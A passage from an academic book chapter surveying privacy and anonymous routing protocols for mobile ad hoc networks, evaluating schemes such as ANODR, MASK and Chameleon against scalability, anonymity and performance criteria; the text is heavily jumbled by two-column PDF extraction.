Medium Access Control (MAC): A sublayer
ofthedatalinklayerspecifiedintheseven-layer
OSI (open systems interconnection) model. It ad-
kEy tErMs dresses problems of moving data frames across a
shared channel.
Authentication: The processes of verifying
the identity of an entity if it is indeed the entity it Routing: The process of selecting paths in a
declares to be. network along which to send data packets.
Intrusion Detection: The techniques or pro- Security: The concepts, measures, or processes
cesses of detecting inappropriate, incorrect, or of protecting data from unauthorized access or
anomalous activities. disruption.
Key Management: The techniques or processes
of creating, distributing, and maintaining a secret
key, which will be used to protect the secrecy of End notE
communications or to ensure the original data are
not maliciously altered.
1
Signal jamming can also be launched at physi-
cal layer, but it is not within the scope of this
chapter because it is more related to electrical
engineering than computer security.
0

Chapter XXVII
Privacy and Anonymity in
Mobile Ad Hoc Networks
Christer Andersson
Combitech, Sweden
Leonardo A. Martucci
Karlstad University, Sweden
Simone Fischer-Hübner
Karlstad University, Sweden
AbstrAct
Providing privacy is often considered a keystone factor for the ultimate take up and success of mobile ad
hoc networking. Privacy can best be protected by enabling anonymous communication and, therefore,
this chapter surveys existing anonymous communication mechanisms for mobile ad hoc networks. On
the basis of the survey, we conclude that many open research challenges remain regarding anonymity
provisioning in mobile ad hoc networks. Finally, we also discuss the notorious Sybil attack in the context
of anonymous communication and mobile ad hoc networks.
IntroductIon to a set of items of interest (e.g., communication

partners, messages) from an attacker’s perspective
The quest for privacy in today’s increasingly per- (Pfitzmann&Hansen,.0The 2 6) capabilitiesof
vasive information society remains a fundamental the attacker are usually modeled by an attacker
research challenge. In the traditional (wired) In- model, which can, for instance, include a rogue
ternet, one essential means for protecting privacy communication partner or an observer tapping
is anonymous communication. Being anonymous the communication lines. Further, more advanced
usually implies that a user remains unlinkable applications can be deployed on top of anonymous
Privacy and Anonymity in Mobile Ad Hoc Networks
communication mechanisms, to, for instance, en- This chapter is structured as follows. First, an
able pseudonymous applications. introduction to privacy, anonymity, and anonymity
This chapter investigates how anonymous metrics is provided in “Background.” Then, exist-
communication can be enabled in mobile ad hoc ing approaches for enabling anonymity in ad hoc
networks (Corson & Macker, 1999); networks networks are described in “Anonymous Commu-
constituted by mobile platforms that establish nication in Mobile Ad Hoc Networks.” In “Survey
on-the-yfl wirelessconnectionsamongthemselves of Anonymous Communication Mechanisms for
and ephemera networks without central entities to Ad Hoc Networks” these approaches are evaluated
control it. They are of great importance as they against the aforementioned requirements. Then,
constitute a basic core functionality needed for de- Sybil attacks in the context of anonymous commu-
ploying ubiquitous computing. In short, ubiquitous nication and mobile ad hoc networks are discussed
computing would allow for computational envi- in “Future Trends.” Finally, conclusions are drawn
ronments providing information instantaneously in “Conclusions.”
through “invisible interfaces,” thus allowing
unlimited spreading and sharing of information.
If realized, ubiquitous computing could offer an bAckground
invaluable support for many aspects of our society
and its institutions. However, if privacy aspects are In this section, the concepts of privacy and anonym-
neglected, there is a great likelihood that the end ity and their relation are introduced. Methods for
product will resemble an Orwellian nightmare. quantifying anonymity are also discussed.
In this chapter, we study how privacy and
anonymity issues are tackled today in mobile ad Definitions of Anonymity and Related
hoc networks by surveying existing anonymous concepts
communication mechanisms adapted for mobile
ad hoc networks1. Only recently, a number of such PfitzmannandHansendefine 0 2 6) ( anonymity as
proposals have been suggested. In the survey, we “thestateofbeingnotidentifiablewithinaset
evaluate some of these approaches against a set subjects, the anonymity set” (p. 6). The anonymity
of general requirements (Andersson, Martucci, set includes all possible subjects in a given scenario,
& Fischer-Hübner, 2005), which assess to which such as possible senders of a message.
degree these approaches are suitable for mobile Related to anonymity is unlinkability, where
ad hoc networks. We also discuss Sybil attacks unlinkability of two or more items of interest (IOIs,
(Douceur, 2002) in the context of anonymous com- e.g., subjects, messages, events, actions, etc.) means
munication and mobile ad hoc networks. that within the system (comprising these and pos-
Figure 1. Unlinkability between a user in the anonymity set and an item of interest
Messages
Anonymity set Communication network

FigureSetting
2. apathbetweenAandD(throughBandC)usinglayeredBencryption; and PKC are PK
the public keys of B and C. KAB and KAC are shared symmetric keys. D is an external receiver
A B:
EPKB{C, KAB, EPKC{D, KAC}}

B C:
EPKC{D, KAC}
C learns D
A B C D
sibly other items), from the attacker’s perspective, and a symmetric key shared with the initiating
these items of interest are no more and no less node (see Figure 2). In this way, expensive public
related after his observation than they are related key encryption is only used for constructing the
concerninghisa-prioriknowledge.(Pfitzmann & data delivery symmetric encryption is
path; for
Hansen, 2006, p. 8) used. Messages encrypted in layers are often de-
Anonymitycanbedefinedintermsof - unlink
noted message onions. Layered encryption enables
ability: sender anonymity entails that a message anonymity as intermediary nodes do not know
cannot be linked to the sender, while receiver whether their predecessor and successor nodes are
anonymity implies that a message cannot be linked the sender or receiver, respectively.
to the receiver (see Figure 1). Analternativeapproach,firstappliedinCrowds
In traditional networks, such as the Internet, (Reiter & Rubin, 1997), is to let the sender select
anonymous communication is often realized by itssuccessorrandomly,whichinturnflipsabiased
anonymous overlay networks, which establish vir- coin to decide whether it should end the path and
tual paths consisting of one or more intermediary connect to the receiver, or extend the path to a
nodes, along which packets are transmitted. Using random node. The flipping of the biased coin is
methods described below, the anonymous overlay repeated until a node decides to connect to the re-
network constructs the paths in such a manner that ceiver (see Figure 3). In this approach, link-to-link
the correlation between the sender and receiver, encryption between intermediary hops in the path
and possibly also the identity of the sender and/or is usually combined with end-to-end encryption.
the receiver, is hidden. This approach enables sender anonymity towards
A classic method enabling anonymity, where network nodes and the receiver, as neither of these
the sender determines the full path, is layered nodes can deduce if the previous node in the path
encryption2: a message is wrapped into several is the sender.
encryption layers. As the message propagates the Another method specifically tailored - for pro
network, these layers are sequentially decrypted viding receiver anonymity is invisible implicit
by each successive node in the path, until the re- addressing(PfitzmannWaidner,
& Invisible
. )7 8 9 1
ceiverdecryptsthefinallayer.Eachlayer usually
implicit addressing hides the identity of the receiver
includes the identity of the next node in the path byfirstencryptingamessageor ( apartofit)with

Figure 3. “Crowds-like” path setting between the sender and receiver
the receiver’s public key (or a shared symmetric less the right to informational self-determination
key). Instead of sending the message directly to is affected. Art. 6 (1) of the EU Data Protection
the receiver, the message is then broadcasted to Directive 95/46/EC embodies the principle of data
all nodes in the network, which all must try to minimization by stating that personal data should
decrypt the message. However, only the intended be limited to data that are adequate, relevant, and
receiver will be able to successfully decrypt the not excessive, and by requiring that data should
message. onlybekeptinaformthatpermitsidentification
of data subjects for no longer than it is necessary
on the relation between Privacy and for the purpose for which the data were collected
Anonymity or for which they are further processed. Conse-
quently, technical tools such as privacy-enhancing
Privacy is recognized either explicitly or implicitly technologies should be available to contribute to
as a fundamental human right by most constitutions the effective implementation of these requirements
of democratic societies. Privacy can be by defined
providing anonymity and/or pseudonymity for
as the right to informational self-determination, the users and other concerned individuals.
that is, individuals must be able to determine for More specific legal requirements - for anony
themselves when, how, to what extent, and for mization can also be found in the E-Communica-
what purpose personal information about them is tions Privacy Directive 2002/58/EC: Pursuant to
communicated to others. Art.9 of the Directive: location data may only be
In Europe, the right for privacy of individuals processed when they are made anonymous, or with
is protected by the by a legal framework mainly the consent of the user or subscriber to the extent
consisting of the EU Data Protection Directive and for the duration necessary for the provision of
46/95 EC, which defines general privacy re - a value-added service.
quirements, and the E-Communications Privacy
Directive/8EC, 5 02 whichspecificallyapplieson Measuring Anonymity
for personal data processing within the electronic
communication sector. This section discusses anonymity metrics, which
An important privacy principle is data minimi- quantify the degree of anonymity in a given sce-
zation, stating that the collection and processing nario in the following manner. First, the given
of personal data should be minimized. Clearly, the attacker model, together with the properties of the
less personal data are collected or processed, the anonymous communication mechanism, are passed

Table 1. A summary of anonymity metrics

Anonymity set size
A classic indicator of anonymity is the size of the anonymity set. This metric is appropriate for mechanisms in which all users are equally likely
to be the sender of a particular message, as in the DC-networks (Chaum, 1988) or Crowds, regarding the Web server (Reiter & Rubin, 1997).
K-anonymity
If a mechanism provides k-anonymity (Sweeney, 2002), k constitutes a lower bound of the anonymity set size n. For example, k = 3 implies that
an attacker cannot exclude more than (n −3 ) users from the anonymity set.
Crowds-based metric
In the Crowds-based metric3 (Reiter & Rubin, 1997), anonymity is measured on a continuum, including the points possible innocence (the
probability that a user is not the sender is not negligible), probable innocencethe
( probabilitythatauserisasender
beyondand
,)/12≥ suspicion
(the user is not more likely than any other user to be the sender). The analysis is based on the communication patterns in Crowds, and the result
is a probability depending on the anonymity set size and the number of corrupted users.
Entropy-based metrics
In entropy-based metrics (Diaz, Seys, Claessens, & Preneel, 20;Serjantov&Danezis,20,each

) userisfirstassignedwithaprobabilityof
being the sender of a message. The entropy regarding which user sent the message is then calculated using Shannon’s theories (Shannon, 1948).
The resulting degree is system-wide and may change depending on, for example, changes in the attacker’s knowledge. Diaz et al. solely bases
their analysis on the probability distributionsequally
( distributed probabilities W max degree of anonymity), while in Ser
metric, a large anonymity set contribute positively to the degree of anonymity.
as input to the anonymity metric. Then, the metric In reactive routing protocols (Perkins, 2001),
determines the degree of anonymity based using routes between nodes are established on demand,
for example, analysis or by simulation, depending meaning that less packets are circulated in the
on the metric at hand. In Table 1, we summarize network, for example, for status sensing. Also
the most common anonymity metrics. standard reactive routing protocols fail to enable
Although the metrics listed above differs in anonymity. As a proof of concept, consider the
many respects, the main parameters contributing reactive protocols dynamic source routing (DSR)
to the degree of anonymity in all metrics are size of (Johnson & Maltz, 1996) and ad hoc on-demand
anonymity set (anonymity set size and k-anonym- distance vector routing (AODV) (Perkins & Royer,
ity), probability distributions (entropy-based metric 1999).
by Diaz et al.), and both (entropy-based metric
by Serjantov and Danezis and the Crowds-based In DSR, during route discovery4 the route
•
metric). request (RREQ) includes the IP addresses
of the sender and receiver in plain. The IPs
Anonymous Communication in Mobile are also disclosed by the route reply (RREP)
Ad Hoc Networks message. During data transfer, the path be-
tween the sender and receiver is included in
In proactive routing protocols (Perkins, 2001), each plain in the packet headers.
node always maintains routes to all other nodes, • AlsoinAODV,theRREQandRREPmes -
including nodes to which no packets are being sages disclose the sender and receiver IP
sent. Standard proactive protocols do not enable addresses. Also, routing data at each node
anonymityasallnodesknowsignificantamounts in an active path discloses the receiver IP.
of information about other nodes.

This situation applies for virtually any standard anonymity is enabled by invisible implicit ad-
routing protocol. So far, two methods for enabling dressing, meaning in this context that a challenge
anonymous communication in mobile ad hoc net- is included in the RREQ that only the receiver
works have been proposed: anonymous routing can decrypt5 .
protocols and anonymous overlay networks. They The main disadvantage with invisible implicit
are explained in the next sections. addressing is that all nodes receiving the RREQ
must try to decrypt the challenge, resulting in
Anonymous routing Protocols considerable overhead especially ( as the RREQ
reaches all nodes). When the RREP is propagated
An anonymous routing protocol replaces the stan- back to the sender on the path created by the
dard routing protocol with a protocol preserving corresponding RREQ message, visible implicit
anonymity (see Figure 4). Anonymous routing addressing(PfitzmannWaidner,
& is
7)89 1 often
protocols normally include building blocks for used to hinder nodes other than the sender from
anonymous neighborhood authentication, anony- matching RREP messages with corresponding
mous route discovery, and anonymous data trans- RREQmessages.Thisisoftenenabledby - includ
fer.Thefirstphaseisnotalwaysincluded; ing sequencenumbersintheRREPandRREQso
instead
many approaches assume that other mechanisms that only the sender can conclude that the sequence
offer this service. number of a given RREP corresponds to an earlier
During anonymous neighborhood authentica- sentoutRREQ.
tion, nodes establish trust relationships with their During anonymous data transfer, data mes-
neighbors (i.e., nodes within one-hop distance). sages are sent along the paths created during route
“Trust” implies that the nodes prove mutual posses- discovery. Only protocols that use source routing
sionofsomevalididentifiers,suchascertificates, can apply layered encryption, as the sender in this
pseudonyms, public/private key-pairs, or combina- case needs to decide the full path. Else, link-to-link
tions thereof. encryption, possibly combined with end-to-end
The task of anonymous route discovery is to encryption, is normally used.
establish an anonymous path between the sender
and receiver. Sender anonymity is often achieved
through layered encryption. Sometimes, receiver
FigureAnonymous
5. overlaynetwork
Figure 4. Anonymous routing protocol
Source Dest. App.
App. Layer
Source Dest.
Layer
Virtual Path
Overlay
Layer
Trans.
Layer Transp.
Layer
Net- Anonymous
Network
work Routing Protocol Layer
Layer

Anonymous overlay networks Survey of Anonymous Communication

Mechanisms for Ad Hoc Networks
In mobile ad hoc networks, anonymous overlay
networks are normally deployed above the routing The survey is divided into two parts: one part
or transport layer (see Figure 5), where they can use for anonymous routing protocols and one for
services from the standard routing protocol (e.g., anonymous overlay networks6. Before the survey,
findingaroutetothenextnodeinthepath) however,orwe
the list the evaluation criteria against
transport layer (e.g., reliable data delivery). which the mechanisms included in the survey are
Anonymous overlay networks can be divided evaluated.
into the following phases: group buildup, path
construction, and data transfer. Evaluation criteria
During group buildup, the user base of the
overlay network is populated. One strategy for SixrequirementsweredefinedbyAnderssonetal.
group buildup is to assign this task to one or more (2005) that an anonymous overlay network should
directory servers, where a set of nodes (or at least meet to be suitable for mobile ad hoc networks.
one node) must act as a directory server (Martucci, These requirements are general enough to be suit-
Andersson, & Fischer-Hübner, 2006). Similarly as able for providing the criteria against which the
in anonymous routing protocols, virtual path set- mechanisms surveyed in this chapter are evaluated.
ting and data transfer are either based on layered They are listed below:
encryption, or link-to-link encryption combined
with end-to-end encryption. R1. The anonymous communication mecha-
nism must scale well. It should perform well
comparison between Anonymous also with a large number of participants.
routing Protocols and Anonymous R2. The anonymous communication mecha-
overlay networks nism must provide strong anonymity
properties. We examine how the studied
In Table 2 we summarize the respective pros approaches resist an attacker model includ-
and cons with anonymous routing protocols and ing a global observer7, path insiders, other
anonymous overlay networks. network nodes, and the receiver.
Table 2. Pros and cons with anonymous routing protocols and anonymous overlay networks
Advantages with Anonymous Routing Protocols
They make it possible to control already on the routing level what information is being disclosed during routing. Yet, this does not
exclude the possibility that additional efforts may be needed in upper layers. Also, most approaches use the shortest path between
the sender and receiver.
Disadvantages with Anonymous Routing Protocols
The replacement of the standard routing protocol; this will likely decrease the user base, which degrades anonymity according
to many metrics. Besides, nodes may be exposed if a connection-oriented transport layer is used above the anonymous routing
protocol, as they establish direct connections between nodes.
Advantages with Anonymous Overlay Networks
Flexibility; an anonymous overlay network is independent of the routing protocol and, further, compatible with applications expecting
services from for example, a reliable transport layer.
Disadvantages with Anonymous Overlay Networks
The performance can be expected to be slightly worse as messages are detoured through a set of overlay nodes, instead of being
transmitted on the shortest route between the sender and recipient.

R3. The anonymous communication mecha- Anonymous Dynamic Source Routing

nism must be fair regarding the distribu- Protocol (AnonDSR)
tion of workload among the nodes. The
workload should be equally distributed (and AnonDSR (Song, Korba, & Yee, 2005) is a source
nodes should not be forced to spend a lot of routing protocol using invisible implicit address-
resources on behalf of others). Else, incen- ing for route discovery. The RREP is created as a
tives should be given for accepting a higher message onion. Both the sender and recipient know
workload. the intermediary nodes in the path. Data messages
R4. The anonymous communication mecha- are sent as message onions on bidirectional paths.
nism must provide acceptable perfor- AnonDSR includes a security parameter estab-
mance. It should be lightweight (e.g., gen- lishment (SPE) protocol for exchanging security
erate few messages and avoid public key parameters prior to route discovery, which contains
operations). We evaluate whether the studied amajoraw fl see
( R2.)
approaches presents arguments indicating a R1. As the SPE protocol is used to establish
good performance. We also evaluate whether shared secrets between sender and receivers,
there are strong assumptions that could ham- the issues regarding it (see R2) may hamper
per performance. scalability.
R5. The anonymous communication mecha- R2. The SPE protocol broadcasts the IDs of
nism must employ a peer-to-peer paradigm the senders and receivers in plain. If used,
(P2P) model. There should be no dependence AnonDSR provides merely confidentiality.
on central hardware/services, or at least, it If not used, AnonDSR provides sender and
should be minimized. We also study whether receiver anonymity against observers, path
there are some implicit requirements for insiders, and network nodes.
centralized services that are hidden by strong AnonDSR changes the message appearance
assumptions. at intermediary hops. Yet, a global observer
R6. The anonymous communication mecha- maycorrelatetheRREQsizesortracedata
nism must handle a dynamic topology. ows
fl inthenetwork.
It must tolerate that nodes are frequently R3. During route discovery, nodes spend energy to
entering or leaving the network. assess whether they are the intended receiver.
Intermediary nodes must perform public key
In the survey, we grade the approaches accord- encryptions.
ing to which degree they satisfy these requirements: R4. The range of the nodes and the network size
=≤ therequirementissatisfiedtoahighdegree; is not specified in the performance - simula
=≤ …issatisfiedtoamediumdegree;=≤ …is tion of AnonDSR, and only route discovery
satisfied to a low degree; and ö = … is violated. is evaluated while data transfer
Regarding the grading of R2, the approaches are and node mobility are not considered. Also,
graded according to which degree they provide as implicit addressing with public key
anonymity against each item in the assumed at- cryptography is used, AnonDSR cannot be
tacker model (see R2). expected to provide high performance.
R5. No special nodes needed, and thus AnonDSR
survey of Anonymous routing adheres well to the P2P paradigm.
Protocols R6. AnonDSR does not support rebuilding of
broken paths. Also, the insecurities in
In this section, we survey a variety of prominent the SPE protocol may cause problems for
anonymous routing protocols proposed in recent new nodes joining the network that wish to
years. The ratings of the mechanisms are listed in establish security parameters with existing
table-form in the next section. nodes.

secure distributed Anonymous rout- pseudonyms. For performance reasons, MASK

ing Protocol (sdAr) avoids invisible implicit addressing during route
discovery; instead, the receiver identity is disclosed
SDAR (Boukerche, El-Khatib, Xu, & Korba, 2004) intheRREQ.Afterroutediscovery,asendermay
is a source routing protocol enabling a system for have multiple active paths to the receiver. End-to-
managing trust: nodes associate their neighbors end and/or link-to-link encryption is employed
with a trust level based on past behavior. Invisible during data transfer, depending on the application
implicit addressing is used to hide the receiver at hand.
identity in the RREQ. The RREP and data - mes
R1. MASK can be expected to scale well as it
sages are sent as message onions. avoids the usage of implicit addressing. Yet,
R1. SDAR can be expected to scale badly as ev- an increased node density (i.e., more neigh-
ery node in the network must perform three bor nodes) may degrade performance during
public key operations per received RREQ anonymous neighborhood authentication.
message. R2. MASK offer sender anonymity against path
R2. SDAR offers sender and receiver anonymity insiders, network nodes, and observers, but
against observers and other network nodes. no receiver anonymity. MASK uses altered
SDAR alters messages appearance and ap- message appearance, random choice of paths,
plied padding to thwart global observers. Still, andper-hopmessagedelaytohardentraffic
onlynodesassumedtoforwardRREQ/RREP analysisduringlowtraffic.Nonodeforwards
packets do so, others drop them. RREQ/RREPmessagesmorethanonce.
R3. Itisnotspecifiedwhetherthecertificate - R3 The au
avoidance of implicit addressing bears
thority (CA) is a central service or distributed a positive impact on fairness.
among the nodes. When processing RREQ R4. Simulation results indicate that MASK pro-
packets, all nodes must perform one public vides good performance. However, the
key encryption, one public key decryption, mutual authentication between neighboring
and one signature generation. nodes was shown to be the most costly op-
R4. There are serious performance issues in eration and in scenarios where the transmis-
SDAR. For instance, every node must perform sion range is small compared to the network
must perform three public key operations for size,
eachRREQitforwards. this may affect performance negatively.
R5. The existence of a CA (or similar) is assumed R5. A trusted authority (TA) is used during the
fordistributingpublickeys.Itisnotspecified bootstrapping phase of the network.
how it would be implemented. R6. Broken paths are handled by broadcasting
R6. We predict that the trust management system error packets in case of a broken path. Still,
in SDAR would suffer in a dynamic topology; the tight synchronization scheme between
it would be difficult for nodes to be highly neighboring nodes may lead to problems in
trusted as they would be ≤ punishedsome for situations where neighboring nodes
leaving the network in the midst of a com- leave and join often.
munication. Also, path rebuilding in case of
broken paths is not considered. Anonymous on-demand routing
(Anodr)
MAsk
ANODR (Kong, Hong, Sanadidi, & Gerla, 2005) is
MASK (Zhang, Liu, & Lou, 2005) does not use a source routing protocol aiming to protect privacy
source routing. Prior to route discovery, MASK byavoidingpersistentidentifiers.Invisibleimpli
performs anonymous neighborhood authentica- addressing based on symmetric encryption is used
tion, and nodes know each other by temporal to hide the receiver identity during route discovery.

The RREP is created as a message onion. During be build for the reply).
datatransfer,itisnotspecifiedwhether ornotANODR
R1. Discount the can be expected to scale
data payload is encrypted. well. However, the bias of the coin flipping
R1. It is unclear how senders and receivers share may have to be adapted if the geographical
symmetric keys. Given that they share a size of the network increases.
key,tosolvethechallengeintheRREQ, R2.the Discount ANODR provides sender anonymity
receiver againstlocalobservers,asthecoinflipping
may have to try all keys shared with other and random padding during route discovery
nodes (see R4). Further, other network nodes confuse observers to a certain degree. No
must try all their shared keys to conclude that receiver anonymity.
they are not the intended receiver. Data messages are padded with random
R2. ANODR offers sender and receiver ano- bits.
nymity against observers, path insiders, R3. There are no special nodes and no public
and networks nodes. Senders and receivers encryption on behalf of other nodes.
are not mutually anonymous. ANODR uses R4. Discount ANODR avoids public key encryp-
traffic mixing to thwart observers, where tion and invisible implicating addressing.
messages are independently and randomly Thecoinflippingmaydegradeperformance
delayed.Yet,trafficpattersareleaked asas onlyon the shortest path may drop the
nodes
nodes assumed to forward the RREP does so. RREQ,resultinginnonoptimalpaths.Also,
Further, as the payload of data messages is RREP packets can be lost for the same
not altered at intermediary hops, it is trivial reason. Unidirectional paths also hamper
foraglobalobservertotracedatatraffic. performance.
R3. Each node must spend considerable resources R5. The nodes have to collectively administrate
whenforwardingRREQpackets. two values determining the bias of the coins
R4. There are serious performance issues in deciding whether a node should forward a
ANODR (see R1). RREQandaRREP,respectively.
Although ANODR has performed reasonably R6. Discount ANODR rebuilds broken paths, but
well in a simulation scenario, problems can does not discuss how to collectively adapt the
be expected in a real world scenario. bias of the coin flipping when the network
R5. No special nodes are needed, and thus AN- characteristics change.
ODR adheres well to the P2P paradigm.
R6. ANODR supports path rebuilding in case of
broken paths. However, it is unclear how new Anonymous routing Protocol for Mo-
nodes should share symmetric keys with old bile Ad Hoc networks (ArM)
nodes
ARM (Seys & Preneel, 2006) aims to foil global
observers by using random time-to-live values and
discount Anonymous on-demand padding for all messages. Senders and receivers
routing (discount Anodr) share one-time pseudonyms. Invisible implicit ad-
dressing hides the receiver by including the secret
Discount ANODR (Yang, Jakobsson, & Wetzel, pseudonymintheRREQ.TheRREPiscreatedas
2006) is a low-latency source routing protocol that a message onion. Link-to-link encryption is used
avoids invisible implicit addressing. A random time for data transfer.
tolivecounterisusedforRREQ/RREPmessages R1. As a tight synchronization scheme is used
to confuse observers implemented ( by flipping
between sender and recipients, it is assumed
a biased coin). Data are sent as message onions that senders shares keys and pseudonyms
along unidirectional paths (i.e., a new path must
0
with a limited set of receivers. nodes in the network, the more generated
R2. ARM offers sender and receiver anonymity RREQpackets.
against networks nodes, path insiders, and R2. Senders and receivers are not mutually anony-
observers. Senders and receivers have an a- mous as they have an a-priori relationship.
priori relationship. In ARM, data messages Anonymity is offered against path insiders
haveauniformsize,RREQ/RREPmessages and network nodes, and ASRP alters message
arerandomlypadded,andRREQ/RREP/data appearance and maintains a uniform message
messages are propagated using random time- size to confuse attackers.
to-live values. The effectiveness of this lim- R3. Allnodesspendsignificantresourceswhen
iteddummytrafficisnotformallyproven. forwarding RREQ and RREP packets. For
R3. While no nodes perform public key operations, theRREQ,seeR1For . propagationofRREP
the amount of nodes forwarding RREQ/ packets, all nodes on the path must perform
RREP and data messages increases due to three public key operations (one private
the random time-to-life values. key decryption and two public key encryp-
R4. If assuming a static environment, there tions).
are no conclusive arguments orthogonal to R4. The performance of ASRP has not been
performance. However, all nodes in ARM simulated. Route discovery can be expected
generateoverheadtraffic. to offer a low performance, as public key
ARM has not yet been simulated to assess encryption is extensively used.
the performance. R5. No special nodes are needed, and thus ASRP
R5. There are no special nodes in ARM. In a real adheres to the P2P paradigm.
world scenario, central infrastructure may be R6. Path rebuilding in case of broken paths is not
required to realize the assumption that each considered. This means that the expensive
nodeshouldpossessauniqueidentifier; routeit is
discovery process has to be initiated
unclear how this would clash with the P2P for each case of path failure.
paradigm.
R6. The assumption that each node establishes a Privacy Preserving routing (PPr)
broadcast key with its neighbors is problem-
atic when considering dynamic topologies. PPR (Capkun, Hubaux, & Jakobsson, 2004) is a
Further, ARM does not consider path rebuild- proactive protocol for communication between
ing in case of broken paths. ad hoc networks interconnected access by fixed
points (AP). Nodes know each other by temporal
distributed Anonymous secure rout- pseudonyms. In the sender network, nodes main-
ing Protocol (AsrP) tain the shortest path to the AP. In the receiver’s
network, the AP maintain the shortest paths to
ASRP (Cheng & Agrawal, 2006) is a routing pro- the nodes. Routing consists of three parts: uplink
tocol not based on source routing where nodes are (distance vector protocol), inter-station, and down-
known by dynamic random pseudonyms. Invisible link (source routing). In uplink, a sender sends a
implicit addressing (based on public encryption) is message that reaches the AP as a message onion.
usedforbothRREQandRREPpackets.Data - mes
In downlink, the receiver’s AP send an onion to
sages are link-to-link and end-to-end encrypted. It the receiver.
isnotspecifiedwhetherthepathsareR1. bidirectional
The AP and the CA are the major points of
or unidirectional. workload aggregation in PPR, but as these
R1. All nodes in the network must perform two are centrally offered services, PPR can be
publickeyoperationsperRREQone ( private expected to scale well.
key decryption and one public key genera- R2. PPR offers sender and receiver anonymity
tion). This hampers scalability as the more

against observers, network nodes, and path mous Routing Protocols

insiders. There are no countermeasures
against global observers in the senders or re- The survey results for all requirements (except R2)
ceivers networks, except message alteration at are summarized in Table 3. The survey results for
intermediaryhops.Anonymityisquantified R2 are summarized in Table 4.
using the entropy-based anonymity metric
(see section “On Measuring Anonymity”).
There is no anonymity against the AP. survEy of AnonyMous ovErlAy
R3. Nodes do not perform special roles or execute nEtworks
public key operations on behalf of others.
R4. Public key encryption is only used for estab- In this section, we study two anonymous overlay
lishing trust relationships among neighboring networks for ad hoc networks: Chameleon (Mar-
nodes. The performance of PPR has not yet tucci et al., 2006) and MRA (Jiang, Vaidya, &
been simulated. Zhao, 2004).
R5. PPR violates the P2P model as the existence
of a CA and several AP is assumed. chameleon
R6. The existence of the AP facilitate the handling
of trust and security issues in a dynamic Chameleon can be described as a variant of Crowds
topology. The uplink protocol is the most adapted for mobile ad hoc networks. In Chameleon,
vulnerable part regarding routing, but it can the nodes share the responsibility of being direc-
be expected to handle dynamic topologies tory servers during group buildup. Node authen-
well. ticationisbasedoncertificatesthe ( existence
TCP (transmission control protocol)/SSL (secure
Summary of Survey Results for Anony-
Table 3. Summary of survey results (except R2)

ARM AnonDSR ANODR SDAR Discount ASRP MASK PPR
Requirement
ANODR
R1: Scalability
R3: Fairness
R4: Performance
R5: P2P |
R6: Dyn. Top.
Table 4. Summary of anonymity requirement R2
ARM AnonDSR ANODR SDAR Discount ASRP MASK PPR8

Attacker model
ANODR
Sender – observer ≤ ≤ ≤ ≤ ≤ ≤ ≤ ≤
Send. – path insider ≤ ≤ ≤ ≤ ≤ ≤ ≤ ≤
Sender – net. node ≤ ≤ ≤ ≤ ≤ ≤ ≤ ≤
Sender – receiver ö ö ö ö ö ö ö ö
Rec. – observer ≤ ≤ ≤ ≤ ö ≤ ö ≤
Rec. - path insider ≤ ≤ ≤ ≤ ö ≤ ö ≤
Rec. – net. node ≤ ≤ ≤ ≤ ö ≤ ö ≤

socket layer) layer is assumed). Data messages receiver.

are end-to-end and link-to-link encrypted or only R1. Scalability may be hampered if the mix set
link-to-link encrypted. is static in a growing network.
R1. The load on each node is approximately R2. As the min path length is one, a mix may learn
constant as the size of the network grows. the identity of both the sender and receiver.
However, if too few directory servers are ThefirstmixalwayslearnsthesenderID.
used, this may put a limit on scalability. Receiver anonymity is in doubt as all mixes
R2. Chameleon offers sender anonymity against broadcast information in the network about
receivers and sender and receiver anonym- which receivers it is currently providing
ity against local observers and malicious services for (i.e., the RUPD messages).
nodes. R3. Incentives for the costly operating of mixes
Thedegreeofanonymityisquantifiedbythe are left as a future research problem.
Crowds-based metric (see “On Measuring R4. MRA is based on pubic-key cryptography.
Anonymity”). Basing MRA on symmetric cryptography
R3. A small subset of the nodes must act as direc- is left as future research. Results from a
tory servers. It is suggested that nodes take performance simulation are presented, but
turns in acting as the directory servers. only different mix settings are compared.
R4. Chameleon is based on light-weight encryp- R5. No central services are needed. Still, estab-
tion. lishing trust between mixes and other nodes
However, the performance of Chameleon has are left as future research. This may require
not yet been assessed through simulation. aid from external trusted nodes.
R5. Chameleon generally follows the P2P para- R6. If the sender or dominator mix move, the
digm. However, nodes are assumed to possess sender may have to switch dominator mix.
certificatesobtainedinadvance If the mix set is small, problems may arise
and the global probability deciding the ex- regarding the mix advertisement as nodes
pected path length has to be administrated only retransmit advertisement messages from
collectively by the nodes their dominator mixes.
R6. Chameleon repairs broken paths at the point
of breach, rather that rebuilding the whole Summary of Survey Results for Anony-
path. Without redundancy, vanishing direc- mous Overlay Networks
tory servers may be a problem.
The results from the survey are summarized in
Table 5.
Mix route Algorithm (MrA)
MRA applies traffic mixing 9

(Chaum, 1981) in a
dIscussIon
mobile ad hoc scenario. A subset of the nodes acts
as mixes, which constitute the virtual paths. Each
From the survey, we can make the following ob-
node assigns a mix as its dominator mix.ARREQ
servations:
is sent to the receiver via the sender’s dominator
mix, triggering the receiver to register at its domi-
1. It is difficult to protect against a global
nator mix with a DREG (dominator registration)
eavesdropper. None of the studied ap-
message. Each mix periodically broadcasts RUPD
proaches implement powerful and proven
(route update) messages containing its registered
countermeasures against global observers.
receiversandapathfield,whichisupdatedasthe
We believe that it is an open research problem
RUPD propagates through the network. When
regarding how to enable such countermea-
it reaches the sender, it contains the path to the
sures while at the same time offering an

Table5.Summaryofsurveyresults(left)andsummaryofanonymityrequirementR2(right)
Requirement Chameleon MRA Attacker model Chameleon MRA

R1: Scalability Sender – observer ≤ ≤
R3: Fairness Send. – path insider ≤ ö/≤ 10
R4: Performance Sender – net. node ≤ ≤

R5: P2P Sender – receiver ≤ ö
R6: Dyn. Top. Rec. – observer ≤ ≤
Rec. - path insider ö ö/≤ 11
Rec. – net. node ≤ ≤
acceptable level of performance in mobile

ad hoc networks12. A Sybil attack (Douceur, 2002) implies one attacker
2. It is difficult to implement invisible im- forgingmultipleidentifiersinthenetworktocont
plicit addressing efficiently. There is a clear an unbalanced portion of the network. Sybil attacks
trade-off between on the one hand enabling can undermine security in, for instance, mobile
receiver anonymity by using invisible implicit ad hoc networks based on reputation schemes or
addressing and on the other hand satisfy- threshold cryptography (Piro, Shields, & Levine,
ing the fairness, dynamic, and scalability 2006). Douceur has showed that preventing Sybil
requirements. The proposals using invisible attacks is practically impossible as it requires a
implicit addressing either use costly public TTP (trusted third party) to manually assert that
key cryptography (e.g., AnonDSR, SDAR, each identity corresponds to only one logical entity
ASRP) or avoid public key operations at in the network. Yet, during the years, and recently
